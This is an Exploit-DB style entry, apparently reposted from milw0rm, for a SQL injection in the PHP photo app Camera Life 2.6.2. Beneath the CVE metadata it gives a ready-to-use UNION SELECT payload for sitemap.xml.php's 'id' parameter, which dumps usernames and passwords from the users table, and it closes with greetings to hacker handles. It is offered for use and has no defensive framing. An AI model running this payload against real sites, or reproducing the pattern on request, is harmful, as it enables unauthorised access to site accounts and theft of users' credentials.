Camera Life 2.6.2 - 'id' SQL Injection

Author: nuclear
type: webapps
platform: php
port: 
date_added: 2008-07-24 
date_updated: 2016-12-26 
verified: 1 
codes: OSVDB-47150;CVE-2008-3355 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcameralife-2.6.2aa.zip

#Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# milw0rm.com [2008-07-25]